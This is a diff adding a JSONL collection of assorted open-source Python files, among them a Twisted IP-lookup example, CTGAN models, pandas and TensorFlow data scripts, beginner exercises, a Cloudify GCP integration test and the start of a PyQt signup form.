diff --git "a/4458.jsonl" "b/4458.jsonl" new file mode 100644--- /dev/null +++ "b/4458.jsonl" @@ -0,0 +1,626 @@ +{"seq_id":"351890824","text":"from twisted.internet import reactor\nfrom twisted.internet.task import react\nfrom twisted.internet.defer import inlineCallbacks\nfrom twisted.web.client import Agent\nfrom twisted.internet.defer import Deferred\nfrom twisted.internet.defer import returnValue\n\nfrom tubing.source import Source\nfrom tubing.sink import LoopingSink\nfrom tubing.tube import tube\nfrom tubing.visual import dump\nfrom tubing.tlogging import log\n\nfrom treq import get\nfrom json import loads\n\n@tube\nclass RequestTube(object):\n \"\"\"Deferred generator for our Source\"\"\"\n def received(self, _):\n page = get('https://api.ipify.org?format=json')\n return page\n\n@tube\nclass DataTube(object):\n \"\"\"Yield from the request and return the data\"\"\"\n @inlineCallbacks\n def received(self, page):\n req = yield page\n data = yield req.text()\n return data\n\n@tube\nclass ParseTube(object):\n \"\"\"Get the ip from the data\"\"\"\n def received(self, data):\n return loads(data)['ip']\n\nclass IPSink(LoopingSink):\n \"\"\"Show the ip\"\"\"\n def received(self, ip):\n print('Your ip is: %s' % ip)\n\ndef retry(error, source, _):\n log('Network Error', 'Treq request failed. Retrying..')\n source.deferredReceived()\n\n@inlineCallbacks\ndef main(reactor):\n\n source = Source()\n series = (DataTube(), ParseTube())\n sink = IPSink(source = source, delay = 5)\n\n source.flowFrom(RequestTube())\n source.flowTo(series).flowTo(sink)\n source.flowFailed(retry, args=[])\n source.deferredReceived()\n\n dump(source, series, sink)\n\n yield Deferred()\n\nif __name__ == '__main__':\n react(main)\n","sub_path":"deferred_loop_example.py","file_name":"deferred_loop_example.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"452978347","text":"import torch\nfrom torch.nn import BatchNorm1d, Dropout, LeakyReLU, Linear, Module, ReLU, Sequential\nfrom ctgan.config import ctgan_setting as cfg\n\n\nclass Discriminator(Module):\n # Note: The lambda_ is based on WGAN + gradient penalty.\n # See Algorithm 1 in Gulrajani et. al. (2017)\n def calc_gradient_penalty(self, real_data, fake_data, device='cpu', pac=10, lambda_=10):\n # real_data.size(0) is batch size, eg. 500\n # real_data.size(1) is number of columns, eg. 15\n alpha = torch.rand(real_data.size(0) // pac, 1, 1, device=device) # eg. ([50, 1, 1])\n # duplicates alpha. For each alpha, # cols is real_data.size(1), # rows is pac.\n alpha = alpha.repeat(1, pac, real_data.size(1)) # eg. [(50, 10 , 15)]\n # change shape so that alpha is the same dimension as real_data and fake_data.\n alpha = alpha.view(-1, real_data.size(1)) # eg[(500, 15)]\n\n # Element-wise multiplication.\n # real_data.shape == fake_data.shape == interpolates.shape == eg. ([500, 15])\n # Note: See section 4 of Gulrajani et. al. (2017), Sampling distribution\n interpolates = alpha * real_data + ((1 - alpha) * fake_data)\n # Note interpolates passes through the Discriminator forward function.\n disc_interpolates = self(interpolates) # disc_interpolates.shape == eg. ([50, 1])\n\n # Computes and returns the sum of gradients of outputs w.r.t. the inputs.\n gradients = torch.autograd.grad(\n outputs=disc_interpolates, inputs=interpolates,\n grad_outputs=torch.ones(disc_interpolates.size(), device=device),\n create_graph=True, retain_graph=True, only_inputs=True\n )[0]\n\n # gradients.shape == [(500, 15)]\n gradient_penalty = ((\n # reshape to pac * real_data.size(1) sums all\n # the norm is a Frobenius norm.\n # It sums over all interpolates/gradients multiplied to same alpha previously.\n gradients.view(-1, pac * real_data.size(1)).norm(2, dim=1) - 1\n ) ** 2).mean() * lambda_\n return gradient_penalty\n\n def __init__(self, input_dim, dis_dims, pack=10):\n super(Discriminator, self).__init__()\n dim = input_dim * pack\n self.pack = pack\n self.packdim = dim\n seq = []\n print('Dropout rate: ', cfg.DROPOUT)\n for item in list(dis_dims):\n #seq += [Linear(dim, item), LeakyReLU(0.2), Dropout(0.5)]\n seq += [Linear(dim, item), LeakyReLU(0.2), Dropout(cfg.DROPOUT)]\n dim = item\n\n seq += [Linear(dim, 1)]\n self.seq = Sequential(*seq)\n\n def forward(self, input):\n # NOTE: disable assert so that model_summary can be printed.\n # this is because batch_size of input x is hardcoded in torchsummary.py.\n # See row 60 of torchsummary.py in torchsummary library\n # See also if model_summary in synthesizer.py\n # instead, this is imposed in synthesizer.py instead.\n # See assert self.batch_size % self.pack == 0.\n # assert input.size()[0] % self.pack == 0\n\n # input.view reshapes the input data by dividing the 1st dim, i.e. batch size\n # and group the data in concatenate manner in 2nd dim\n # example, if input dim is ([500, 15]) and pack is 10,\n # then it is reshaped to ([500/10, 15*10)] = ([50, 150])\n return self.seq(input.view(-1, self.packdim))\n\n\nclass Residual(Module):\n # NOTE: a Residual layer will be created for each one of the values in gen_dims provided\n def __init__(self, i, o):\n super(Residual, self).__init__()\n self.fc = Linear(i, o)\n self.bn = BatchNorm1d(o)\n self.relu = ReLU()\n\n def forward(self, input):\n out = self.fc(input)\n out = self.bn(out)\n out = self.relu(out)\n # concatenate the columns. See 4.4 of Xu et. al (2019),\n # where h2 concat h1 concat h0 before passing through last FCs to generate alpha, beta and d.\n return torch.cat([out, input], dim=1)\n\n\nclass Generator(Module):\n def __init__(self, embedding_dim, gen_dims, data_dim):\n super(Generator, self).__init__()\n dim = embedding_dim\n seq = []\n for item in list(gen_dims):\n seq += [Residual(dim, item)]\n dim += item\n seq.append(Linear(dim, data_dim))\n self.seq = Sequential(*seq)\n\n def forward(self, input):\n data = self.seq(input)\n return data\n","sub_path":"ctgan/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"357331325","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/bouma/gitprojects/provgroningen/buildout/src/djinn_i18n/djinn_i18n/views/po.py\n# Compiled at: 2014-08-22 05:05:49\nimport json, polib\nfrom django.views.generic import View\nfrom django.http import HttpResponse\nfrom djinn_i18n.tool import TOOL\n\nclass EntryEncoder(json.JSONEncoder):\n\n def default(self, obj):\n if isinstance(obj, polib.POEntry):\n return {'msgid': obj.msgid, 'msgstr': obj.msgstr, \n 'comment': obj.comment, \n 'tcomment': obj.tcomment}\n return json.JSONEncoder.default(self, obj)\n\n\nclass POView(View):\n\n @property\n def locale(self):\n return self.kwargs.get('locale')\n\n def get(self, request, *args, **kwargs):\n entries = TOOL.get_entries(self.locale)\n return HttpResponse(json.dumps(entries, skipkeys=True, cls=EntryEncoder), content_type='application/json')","sub_path":"pycfiles/djinn_i18n-1.0.8.tar/po.py","file_name":"po.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"134249259","text":"import pandas as pd\n\ndef main():\n df = pd.read_csv('InterpolatedWithCAPEX2.csv')\n df_N = pd.read_csv('InterpolatedNum.csv')\n max_D = {'D REVENUE':df['D REVENUE'].max(), 'U CR':df['U CR'].max(), 'D OE':df['D OE'].max(), \n 'D NOI':df['D NOI'].max(),'U CAPEX':df['U CAPEX'].max(), 'U CWK':df['U CWK'].max()} \n min_D = {'D REVENUE':df['D REVENUE'].min(), 'U CR':df['U CR'].min(), 'D OE':df['D OE'].min(), \n 'D NOI':df['D NOI'].min(),'U CAPEX':df['U CAPEX'].min(), 'U CWK':df['U CWK'].min()}\n max_N = {'U REVENUE':df_N['U REVENUE'].max(), 'D CR':df_N['D CR'].max(), 'U OE':df_N['U OE'].max(), \n 'U NOI':df_N['U NOI'].max(),'D CAPEX':df_N['D CAPEX'].max(), 'D CWK':df_N['D CWK'].max()} \n min_N = {'U REVENUE':df_N['U REVENUE'].min(), 'D CR':df_N['D CR'].min(), 'U OE':df_N['U OE'].min(), \n 'U NOI':df_N['U NOI'].min(),'D CAPEX':df_N['D CAPEX'].min(), 'D CWK':df_N['D CWK'].min()}\n \n filas_d, columnas_d = df.count()-1, len(df.columns)-1\n dataset_D = df.values\n #Variables a pasar a la funcion generate_population\n d_fcf = dataset_D[filas_d, columnas_d][1]\n filas_n, columnas_n = df_N.count()-1, len(df_N.columns)-1\n dataset_N = df_N.values\n u_fcf = dataset_N[filas_d, columnas_d][1]\n ##Falta idear una forma en la que se pueda pasar u_fcf y d_fcf a apply function que no se por parametro\n\n ##Calculo de las x\n x1 = df_N['U REVENUE'].corr(df_N['U FCF'])\n x2 = df_N['D CR'].corr(df_N['U FCF'])\n x3 = df_N['U OE'].corr(df_N['U FCF'])\n x4 = df_N['U NOI'].corr(df_N['U FCF'])\n x5 = df_N['D CAPEX'].corr(df_N['U FCF'])\n x6 = df_N['D CWK'].corr(df_N['U FCF'])\n x7 = df['D REVENUE'].corr(df['D FCF'])\n x8 = df['U CR'].corr(df['D FCF'])\n x9 = df['D OE'].corr(df['D FCF'])\n x10 = df['D NOI'].corr(df['D FCF'])\n x11 = df['U CAPEX'].corr(df['D FCF'])\n x12 = df['U CWK'].corr(df['D FCF'])\n\n print(u_fcf)\n\n\n\nif __name__ == \"__main__\":\n main()\n ","sub_path":"Combination/neuralnetwork.py","file_name":"neuralnetwork.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"580024509","text":"\"\"\"Build rejection tables with metric information.\n\nThis script will create tables listing the confusion table metrics,\nsensitivity and specificity at different rejection thresholds. Also\nincluded is the percentage of samples which are rejected in each\nthreshold.\nA seperate table will be created for each model and species-antibiotic \nscenario.\n\"\"\"\n\n\nimport argparse\nimport collections\nimport json\nimport os\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import average_precision_score\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import confusion_matrix\n\nimport numpy as np\nimport pandas as pd\n\nfrom tqdm import tqdm\n\nfrom maldi_learn.metrics import specificity_score\nfrom maldi_learn.metrics import sensitivity_score\nfrom utilities import _encode\n\n# Global metadata information; this will be updated by the script to\n# ensure that we are working with data files from the *same* sources\n# in order to create curves.\nmetadata_versions = {}\n\ndef _add_or_compare(metadata):\n if not metadata_versions:\n metadata_versions.update(metadata)\n else:\n # Smarter way to compare the entries of the dictionaries with\n # each other.\n assert metadata_versions == metadata\n\n\ndef calc_metrics_for_rejection_threshold(y_true, y_score, threshold):\n \"\"\"Calculate metrics for a certain rejection threshold.\n\n This function simulates a rejection scenario based on prediction\n scores for a given classifier. To this end, potential probability\n thresholds are generated and the classifier is simulated with the\n corresponding rejection rate.\n\n Parameters\n ----------\n y_true : `numpy.array` or `list`\n True labels\n\n y_score : `numpy.array` or `list`\n Classifier prediction scores\n\n threshold: `int`\n Rejection threshold. All samples with a predicted max class\n probability below this threshold will be discarded.\n\n Returns\n -------\n Pandas dataframe with all metrics, rejection threshold and rejection\n percentage as columns.\n \"\"\"\n # Determine maximum class probability to apply threshold cut-off\n # on both classes. \n y_score_max = np.amax(y_score, axis=1)\n n_samples = len(y_score_max)\n minority_class = np.argmin(np.bincount(y_true))\n\n # Get the indices that we want to *keep*, i.e. those test\n # samples whose maximum probability exceeds the threshold\n indices = y_score_max > threshold\n\n # Subset the predictions and the labels according to these\n # indices and calculate the desired metrics.\n y_true_ = y_true[indices]\n y_pred_proba_ = y_score[indices][:, minority_class]\n\n # Predict the positive class if the prediction threshold is\n # larger than the one we use for this iteration.\n y_pred = np.zeros_like(y_pred_proba_)\n y_pred[y_pred_proba_ > threshold] = 1.0\n\n # Ensures that we are working with the proper scenario here;\n # we need two different classes to perform the calculation.\n if len(set(y_true_)) != 2:\n return None\n \n # Calculate percentage of rejected samples \n n_rejected = len(y_true) - len(y_true_) \n percentage_rejected = round(n_rejected / n_samples, 5)\n\n\n # Calculate confusion matrix\n TN, FP, FN, TP = confusion_matrix(y_true_, \n y_pred,\n labels=[0,1]\n ).ravel() \n\n # Calculate metrics\n average_precision = average_precision_score(y_true_, y_pred_proba_)\n accuracy = accuracy_score(y_true_, y_pred)\n roc_auc = roc_auc_score(y_true_, y_pred_proba_)\n specificity = round(specificity_score(y_true_, y_pred), 5)\n sensitivity = round(sensitivity_score(y_true_, y_pred), 5)\n\n # Convert into pd.DataFrame format for appending the overall\n # dataframe \n row = pd.DataFrame({\n 'threshold': [threshold],\n 'percentage rejected samples': [percentage_rejected],\n 'specificity': [specificity],\n 'sensitivity': [sensitivity],\n 'TP': [TP],\n 'FP': [FP],\n 'TN': [TN],\n 'FN': [FN],\n })\n\n return row\n\n\ndef build_rejection_table(df, outdir, curve_type='calibrated'):\n \"\"\"Contruct table with different rejection threshold in each row.\n\n This function simulates different rejection scenarios based on the\n classifier scores. Each line represents the metrics and percentage\n of rejected samples for a different rejection ratio.\n\n Parameters\n ----------\n df : `pandas.DataFrame`\n TBD\n\n outdir : str\n Output directory; this is where the plots will be stored.\n \n curve_type : str\n Type of classifier, either `calibrated` or `raw`.\n\n Returns\n -------\n Nothing. As a side-effect of calling this function, tables will be\n generated.\n \"\"\"\n\n thresholds = np.linspace(0.5, 1.0, 21)\n\n # The way the data are handed over to this function, there is only\n # a single model.\n model = df.model.unique()[0]\n\n for (species, antibiotic), df_ in df.groupby(['species', 'antibiotic']):\n table_df = pd.DataFrame()\n\n y_test = np.vstack(df_['y_test']).ravel()\n y_score = np.vstack(df_['y_score'])\n y_score_calibrated = np.vstack(df_['y_score_calibrated'])\n\n for threshold in thresholds:\n\n if curve_type=='calibrated':\n row = calc_metrics_for_rejection_threshold(\n y_test, y_score_calibrated, threshold\n )\n\n else:\n row = calc_metrics_for_rejection_threshold(\n y_test, y_score, threshold\n )\n \n if row is not None:\n table_df = table_df.append(row)\n \n print(table_df)\n filename = (\n f'Rejection_table_' +\n f'{species}_{antibiotic}_' + \n f'{curve_type}_{model}.csv'\n )\n table_df.to_csv(\n os.path.join(outdir, filename),\n index=False\n )\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('INPUT', type=str, help='Input directory')\n parser.add_argument(\n '--outdir',\n type=str,\n default='.',\n help='Output directory'\n )\n\n args = parser.parse_args()\n\n # Stores data rows corresponding to individual scenarios. Each\n # scenario involves the same model (plus multiple antibiotics,\n # or species, combinations).\n scenarios = collections.defaultdict(list)\n\n # Keys to skip when creating a single row in the data dictionary\n # above. This ensures that we only add single pieces of data and\n # have an easier time turning every scenario into a data frame.\n skip_keys = ['years', 'metadata_versions']\n\n # Contains the combinations of species--antibiotic that we want to\n # plot in the end. Anything else is ignored.\n selected_combinations = [\n ('Escherichia coli', 'Cefepime'),\n ('Klebsiella pneumoniae', 'Ceftriaxone'),\n ('Staphylococcus aureus', 'Oxacillin')\n ]\n\n files_to_load = []\n for root, dirs, files in os.walk(args.INPUT):\n files_to_load.extend([\n os.path.join(root, fn) for fn in files if\n os.path.splitext(fn)[1] == '.json'\n ])\n\n for filename in tqdm(files_to_load, desc='File'):\n\n with open(filename) as f:\n data = json.load(f)\n\n antibiotic = data['antibiotic']\n species = data['species']\n model = data['model']\n\n if (species, antibiotic) not in selected_combinations:\n continue\n\n _add_or_compare(data['metadata_versions'])\n\n row = {\n key: data[key] for key in data.keys() if key not in skip_keys\n }\n\n basename = os.path.basename(filename)\n\n scenarios[model].append(row)\n\n for model in sorted(scenarios.keys()):\n\n rows = scenarios[model]\n df = pd.DataFrame.from_records(rows)\n\n build_rejection_table(df, args.outdir)\n","sub_path":"amr_maldi_ml/building/deprecated/build_table2_rejection.py","file_name":"build_table2_rejection.py","file_ext":"py","file_size_in_byte":8027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"410831944","text":"# 1\nname = input(\"What is your name? >> \")\nprint(\"Hello, \" + name + \"!\")\n\n# 2\nlength_name = len(name)\nupper_name = name.upper()\n\nprint(\"YOUR NAME HAS\", length_name, \"letters in it, that's pretty dang cool!\".upper())\n\n# 3\nsubject = input(\"What is your favorite subject? >> \")\nmadlib = \"%s's favorite subject in school is %s\"%(name, subject)\nprint(madlib)\n\n# 4\nday = int(input(\"Day (0-6)? >> \"))\n\nif day == 0:\n print(\"Sunday\")\nif day == 1:\n print(\"Monday\")\nif day == 2:\n print(\"Tuesday\")\nif day == 3:\n print(\"Wednesday\")\nif day == 4:\n print(\"Thursday\")\nif day == 5:\n print(\"Friday\")\nif day == 6:\n print(\"Saturday\")\nif day > 6:\n print(\"You did not input a number ranging from 0-6; please try again.\")\n\n# 5\n\nif day == 0:\n print(\"Sleep in, you've earned it\")\nif day == 1:\n print(\"Go to work, you lazy bum!\")\nif day == 2:\n print(\"Go to work, you lazy bum!\")\nif day == 3:\n print(\"Go to work, you lazy bum!\")\nif day == 4:\n print(\"Go to work, you lazy bum!\")\nif day == 5:\n print(\"Go to work, you lazy bum!\")\nif day == 6:\n print(\"Sleep in, you've earned it\")\n\n# 6\ntemp = int(input(\"Temperature in Celsius? >> \"))\ntemp = temp * 1.8 + 32\n\nprint(temp)\n\n# 7\nbill = int(input(\"How much was your bill? >> \"))\nserv = (input(\"How do you rate the serivce you've recieved? (Good, Fair, or Poor) >> \"))\n\"{:.2f}\".format(bill)\ng = bill + bill * .2\nf = bill + bill * .15\np = bill + bill * .1\n\nif serv == \"Good\":\n bill = bill + bill * .2\n print(\"Your total with tip is\", bill)\nif serv == \"Fair\":\n bill = bill + bill * .15\n print(\"Your total with tip is\", bill)\nif serv == \"Poor\":\n bill = bill + bill *.1\n print(\"Your total with tip is\", bill)\n\n# 8\nper = int(input(\"How many ways are we splitting the bill today? >> \"))\nbill = bill / per\nprint(\"The amount per person comes out to\", bill)\n\n# 9\nn = 0\nwhile n < 10:\n n += 1\n print(\"The count is\", n)\n\n# 10\ncoins = 0\nprint(\"You currently have\", coins, \" coins.\")\nblank = input(\"Would you be interested in another? (Yes, or No) >> \")\nwhile blank == \"Yes\":\n coins += 1\n print(\"You currently have\", coins, \" coins.\")\n blank = input(\"Would you be interested in another? (Yes, or No) >> \")\nelse:\n print(\"Okay, Mario. Have a good day!\")\n\n\n","sub_path":"exercises.py","file_name":"exercises.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"331858808","text":"#coding=utf-8\n__author__ = 'Michal Petrovič'\n\nfrom comtypes.client import *\n\n\nclass ComtypesReader:\n\n def __init__(self, file_path):\n com_object = CreateObject(\"DAO.DBEngine.36\")\n self.database = com_object.OpenDatabase(file_path)\n\n def get_item(self, table_name, column_name, conditions):\n num_rows = self.get_num_rows(table_name, conditions)\n if num_rows != 0:\n rs = self.database.OpenRecordset(\"SELECT \" + column_name + \" FROM \" + table_name + \" WHERE \" + conditions)\n return rs.Fields(0).Value\n else:\n return None\n\n def get_items(self, table_name, columns, conditions):\n num_rows = self.get_num_rows(table_name, conditions)\n\n rs = self.database.OpenRecordset(\"SELECT \" + columns + \" FROM \" + table_name + \" WHERE \" + conditions)\n num_col = rs.Fields.Count\n table = [[None for _ in range(num_col)] for _ in range(num_rows)]\n\n for a in range(num_rows):\n for b in range(num_col):\n table[a][b] = rs.Fields(b).Value\n rs.MoveNext()\n\n return table\n\n def get_num_rows(self, table_name, conditions=None):\n if conditions is None:\n rs = self.database.OpenRecordset(\"SELECT COUNT(*) FROM \" + table_name)\n return rs.Fields(0).Value\n else:\n rs = self.database.OpenRecordset(\"SELECT COUNT(*) FROM \" + table_name + \" WHERE \" + conditions)\n return rs.Fields(0).Value\n\n def get_table(self, table_name):\n rs = self.database.OpenRecordset(\"SELECT * FROM \" + table_name)\n x = self.get_num_rows(table_name)\n y = rs.Fields.Count\n table = [[None for _ in range(y)] for _ in range(x)]\n\n for a in range(x):\n for b in range(y):\n table[a][b] = rs.Fields(b).Value\n rs.MoveNext()\n\n return table","sub_path":"plugin/comtypesReader.py","file_name":"comtypesReader.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"96693754","text":"import unicodecsv as csv\n\nfrom app import create_app\nfrom app.models import Disclosure\n\napp = create_app()\n\nwith open('democratic senate.csv', 'rb') as fh:\n reader = csv.reader(fh)\n for row in reader:\n # Normalize first names\n contributor = row[1]\n contributor = contributor.split(', ')\n if len(contributor) > 1:\n contributor.append(contributor.pop(0))\n contributor = ' '.join(contributor)\n row[1] = contributor\n Disclosure.to_csv(row[1:], filename=row[0])\n","sub_path":"senate.py","file_name":"senate.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"217047345","text":"from __future__ import print_function\nimport math\nfrom IPython import display\nfrom matplotlib import cm\nfrom matplotlib import gridspec\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn import metrics\nimport tensorflow as tf\nfrom tensorflow.python.data import Dataset\n\ncalifornia_housing_dataframe = pd.read_csv(\"california_housing.csv\")\n\n\n# 获取特征\ndef preprocess_features(california_housing_dataframe):\n selected_features = california_housing_dataframe[\n [\"latitude\",\n \"longitude\",\n \"housing_median_age\",\n \"total_rooms\",\n \"total_bedrooms\",\n \"population\",\n \"households\",\n \"median_income\"]]\n processed_features = selected_features.copy()\n processed_features[\"rooms_per_person\"] = (\n california_housing_dataframe[\"total_rooms\"] / california_housing_dataframe[\"population\"]\n )\n return processed_features\n\n\n# 获取median_house_value\ndef preprocess_targets(california_housing_dataframe):\n output_targets = pd.DataFrame()\n # 取出median_house_value 并缩放median_house_value返回\n output_targets[\"median_house_value\"] = (california_housing_dataframe[\"median_house_value\"] / 1000.0)\n return output_targets\n\n\ndef splitData():\n # 将数据拆分 训练数据,验证数据\n training_examples = preprocess_features(california_housing_dataframe.head(12000))\n training_targets = preprocess_targets(california_housing_dataframe.head(12000))\n\n validation_examples = preprocess_features(california_housing_dataframe.tail(5000))\n validation_targets = preprocess_targets(california_housing_dataframe.tail(5000))\n\n # correlation_dataframe = training_examples.copy()\n # correlation_dataframe[\"target\"] = training_targets[\"median_house_value\"]\n #\n # print(correlation_dataframe.corr())\n\n # print(\"Training examples summary:\")\n # display.display(training_examples.describe())\n # print(\"Validation examples summary:\")\n # display.display(validation_examples.describe())\n #\n # print(\"Training targets summary:\")\n # display.display(training_targets.describe())\n # print(\"Validation targets summary:\")\n # display.display(validation_targets.describe())\n\n\ndef construct_feature_columns(input_features):\n # set = set([tf.feature_column.numeric_column(my_feature)\n # for my_feature in input_features])\n # print(set)\n return set([tf.feature_column.numeric_column(my_feature)\n for my_feature in input_features])\n\n\ndef my_input_fn(features, targets, batch_size=1, shuffle=True, num_epochs=None):\n features = {key: np.array(value) for key, value in dict(features).items()}\n ds = Dataset.from_tensor_slices((features, targets))\n ds = ds.batch(batch_size).repeat(num_epochs)\n if shuffle:\n ds = ds.shuffle(10000)\n\n features, labels = ds.make_one_shot_iterator().get_next()\n\n return features, labels\n\n\ndef train_model(learning_rate, steps, batch_size, training_examples,\n training_targets, validation_examples, validation_targets\n ):\n periods = 50\n steps_per_period = steps / periods\n\n # 梯度优化\n my_optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n my_optimizer = tf.contrib.estimator.clip_gradients_by_norm(my_optimizer, 5.0)\n # 创建线性回归模型\n linear_regressor = tf.estimator.LinearRegressor(feature_columns=construct_feature_columns(training_examples),\n optimizer=my_optimizer)\n\n # 创建输入函数\n training_input_fn = lambda: my_input_fn(training_examples, training_targets[\"median_house_value\"],\n batch_size=batch_size)\n\n predict_training_input_fn = lambda: my_input_fn(training_examples,\n training_targets[\"median_house_value\"],\n num_epochs=1,\n shuffle=False)\n predict_validation_input_fn = lambda: my_input_fn(validation_examples,\n validation_targets[\"median_house_value\"],\n num_epochs=1,\n shuffle=False)\n print(\"Training model...\")\n print(\"RMSE (on training data):\")\n training_rmse = []\n validation_rmse = []\n for period in range(0, periods):\n # 训练模型\n linear_regressor.train(input_fn=training_input_fn, steps=steps_per_period)\n # 使用模型对预测数据集进行预测\n training_predictions = linear_regressor.predict(input_fn=predict_training_input_fn)\n # 获取预测结果\n training_predictions = np.array([item['predictions'][0] for item in training_predictions])\n print(\"training_predictions\",training_predictions)\n\n # 使用模型对验证数据集进行验证\n validation_predictions = linear_regressor.predict(input_fn=predict_validation_input_fn)\n #获取预测结果\n validation_predictions = np.array([item['predictions'][0] for item in validation_predictions])\n print(\"validation_predictions\",validation_predictions)\n\n # 计算训练和验证的损失 -- 均方根误差\n training_root_mean_squared_error = math.sqrt(metrics.mean_squared_error(training_predictions, training_targets))\n print(\"training_root_mean_squared_error\",training_root_mean_squared_error)\n\n validation_root_mean_squared_error = math.sqrt(\n metrics.mean_squared_error(validation_predictions, validation_targets))\n print(\" period %02d : %0.2f\" % (period, training_root_mean_squared_error))\n #添加均方根误差\n training_rmse.append(training_root_mean_squared_error)\n validation_rmse.append(validation_root_mean_squared_error)\n\n print(\"Model training finished.\")\n # Output a graph of loss metrics over periods.\n plt.ylabel(\"RMSE\")\n plt.xlabel(\"Periods\")\n plt.title(\"Root Mean Squared Error vs. Periods\")\n plt.tight_layout()\n plt.plot(training_rmse, label=\"training\")\n plt.plot(validation_rmse, label=\"validation\")\n plt.show()\n\n return linear_regressor\n\nif __name__ == '__main__':\n training_examples = preprocess_features(california_housing_dataframe.head(12000))\n training_targets = preprocess_targets(california_housing_dataframe.head(12000))\n\n validation_examples = preprocess_features(california_housing_dataframe.tail(5000))\n validation_targets = preprocess_targets(california_housing_dataframe.tail(5000))\n\n minimal_features = [\n \"median_income\",\n \"latitude\",\n ]\n\n minimal_training_examples = training_examples[minimal_features]\n minimal_validation_examples = validation_examples[minimal_features]\n\n _ = train_model(\n learning_rate=0.01,\n steps=500,\n batch_size=5,\n training_examples=minimal_training_examples,\n training_targets=training_targets,\n validation_examples=minimal_validation_examples,\n validation_targets=validation_targets)\n\n","sub_path":"beginLearn/ten/google.tensorflow/p4/t2.py","file_name":"t2.py","file_ext":"py","file_size_in_byte":7179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"143242166","text":"# #######\n# Copyright (c) 2019 Cloudify Platform Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nfrom random import random\n\nfrom integration_tests.tests.test_cases import PluginsTest\n\nPLUGIN_NAME = 'cloudify-azure-plugin'\nDEVELOPMENT_ROOT = os.path.abspath(\n os.path.join(os.path.dirname(\n os.path.realpath(__file__)), '../..'))\nTEST_KEY_PATH = '/tmp/foo.rsa'\nTEST_PUB_PATH = '/tmp/foo.rsa.pub'\nGCP_KEY_PATH = '/tmp/gcp_private_key'\ntest_id = '{0}{1}'.format(\n os.getenv('CIRCLE_JOB', 'cfy'),\n os.getenv('CIRCLE_BUILD_NUM', str(random())[-4:-1])\n)\n\n\nclass GCPPluginTestCase(PluginsTest):\n\n base_path = os.path.dirname(os.path.realpath(__file__))\n\n @property\n def plugin_root_directory(self):\n return os.path.abspath(os.path.join(self.base_path, '..'))\n\n @property\n def inputs(self):\n return {\n 'region': os.getenv('gcp_region'),\n 'network_name': '{0}network'.format(test_id),\n 'subnet_name': '{0}subnet'.format(test_id)\n }\n\n def create_secrets(self):\n secrets = {\n 'agent_key_private': os.getenv('agent_key_private',\n open(TEST_KEY_PATH).read()),\n 'agent_key_public': os.getenv('agent_key_public',\n open(TEST_PUB_PATH).read()),\n 'gcp_region': os.getenv('gcp_region'),\n 'gcp_zone': os.getenv('gcp_zone'),\n 'gcp_private_key': open(GCP_KEY_PATH).read(),\n 'gcp_private_key_id': os.getenv('gcp_private_key_id'),\n 'gcp_project_id': os.getenv('gcp_project_id'),\n 'gcp_client_id': os.getenv('gcp_client_id'),\n 'gcp_client_email': os.getenv('gcp_client_email'),\n 'gcp_client_x509_cert_url': os.getenv('gcp_client_x509_cert_url'),\n }\n self._create_secrets(secrets)\n\n def upload_plugins(self):\n self.upload_mock_plugin(\n PLUGIN_NAME, self.plugin_root_directory)\n self.upload_mock_plugin(\n 'cloudify-utilities-plugin',\n os.path.join(DEVELOPMENT_ROOT, 'cloudify-utilities-plugin'))\n self.upload_mock_plugin(\n 'cloudify-ansible-plugin',\n os.path.join(DEVELOPMENT_ROOT, 'cloudify-ansible-plugin'))\n\n def test_blueprints(self):\n self.upload_plugins()\n self.create_secrets()\n self.check_hello_world_blueprint('gcp', self.inputs, 400)\n self.check_db_lb_app_blueprint(\n 'gcp', 800,\n {\n 'resource_prefix': 'dblbapp',\n 'resource_suffix': test_id\n }\n )\n","sub_path":".cicd/test_manager.py","file_name":"test_manager.py","file_ext":"py","file_size_in_byte":3150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"260678994","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtGui import QIcon\r\nfrom Options import customer_signup, seller_signup\r\n\r\nclass Ui_SignupPanel(object):\r\n def setupUi(self, SignupPanel):\r\n SignupPanel.setObjectName(\"SignupPanel\")\r\n SignupPanel.resize(800, 643)\r\n self.centralwidget = QtWidgets.QWidget(SignupPanel)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.Customeradd_btn = 